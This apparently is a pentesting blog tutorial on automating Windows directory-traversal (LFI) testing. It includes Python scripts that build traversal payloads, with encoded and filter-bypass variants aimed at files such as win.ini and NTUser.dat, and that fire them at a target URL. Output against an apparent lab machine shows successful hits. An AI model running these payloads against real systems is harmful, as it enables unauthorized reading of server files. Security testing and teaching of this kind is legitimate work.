Automating Windows LFI
Introduction
Commonly, when testing for directory traversal on a windows system I spend a significant amount of time manually editing my traversal strings and it takes a while so I automated it.
Tools Needed
We will be using SecLists repository found on github by danielmiessler. Specifically, we are going to be using this file:
Here are the modified contents. For the sake of simplicity in this tool, we will be omitting serveral lines, checking for the existence of a select few files.
C:/Users/Administrator/NTUser.dat
C:/boot.ini
C:/Windows/win.ini
C:/WINNT/win.ini
win.ini
We also need a list of traversal strings that will be used to test for LFI. Something like this:
../
..\
...//
Writing the Code
Our goal here is to get a list of files to request, where we add the traversal strings to the file names to test. We want a list that looks something like:
../C:/Users/Administrator/NTUser.dat
../../C:/Users/Administrator/NTUser.dat
../../../C:/Users/Administrator/NTUser.dat
../../../../C:/Users/Administrator/NTUser.dat
../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../../C:/Users/Administrator/NTUser.dat
../../../../../../../../../C:/Users/Administrator/NTUser.dat
We want a list of these for each filename we want to check. If we run this through the entire file list, we will have several thousand files to check which could slow things down.
Creating the List of URLs to Test
We write a script that loops over our tokens and our filenames writing them all to a file.
#!/usr/bin/python
# create a list of traversal tokens
tokens = [
"../",
"....//",
"....\\",
"....\\\\",
"..\\",
"..././",
"..\/",
"%2e%2e%2f",
"%252e%252e%252f",
"%c0%ae%c0%ae%c0%af",
"%uff0e%uff0e%u2215",
"%uff0e%uff0e%u2216"
]
# create a list of filenames
filenames = [
"C:/Users/Administrator/NTUser.dat",
"C:/boot.ini",
"C:/Windows/win.ini",
"C:/WINNT/win.ini",
"win.ini"
]
# create traversal strings
def stringify(token, filename):
strings = []
for i in range(1, 10):
string = token * i + filename
strings.append(string)
return strings
# loop through each list
for i in tokens:
for j in filenames:
# get list of traversal_strings
traversal_strings = stringify(i, j)
print traversal_strings
# write strings to file
with open('windows-lfi-list.txt', 'a+') as f:
for s in traversal_strings:
f.write("%s\n" % s)
f.close()
Testing for LFI with our new file list
Now that we have our list we can test to see if we can access any files on a host
We write a pythons script that checks a accepts a file with a list of urls to test and a url
#!/usr/bin/python
# date 2020-06-22
# author kegn
import sys
import requests
import os
def check_files():
filename = sys.argv[1]
with open(filename) as f:
lines = f.read().splitlines()
base_url = sys.argv[2]
for i in lines:
url = base_url + i
content = requests.get(url)
if content.status_code == 200:
print "[*] Found at : " + url
else:
#print "[*] Nothing found - testing next string"
pass
if len(sys.argv) !=3:
print " "
print "Usage : python lfi-checker filelist-to-check http://10.10.10.10/"
print " "
else:
check_files()
print "[*] script complete"
Script output:
[root@kadi lfi-checker]# ./lfi-windows.py windows-lfi-list.txt http://10.10.10.184/
[*] Found at : http://10.10.10.184/../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/../../../../../../../../../windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\..\..\..\..\..\..\..\..\windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] Found at : http://10.10.10.184/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
[*] script complete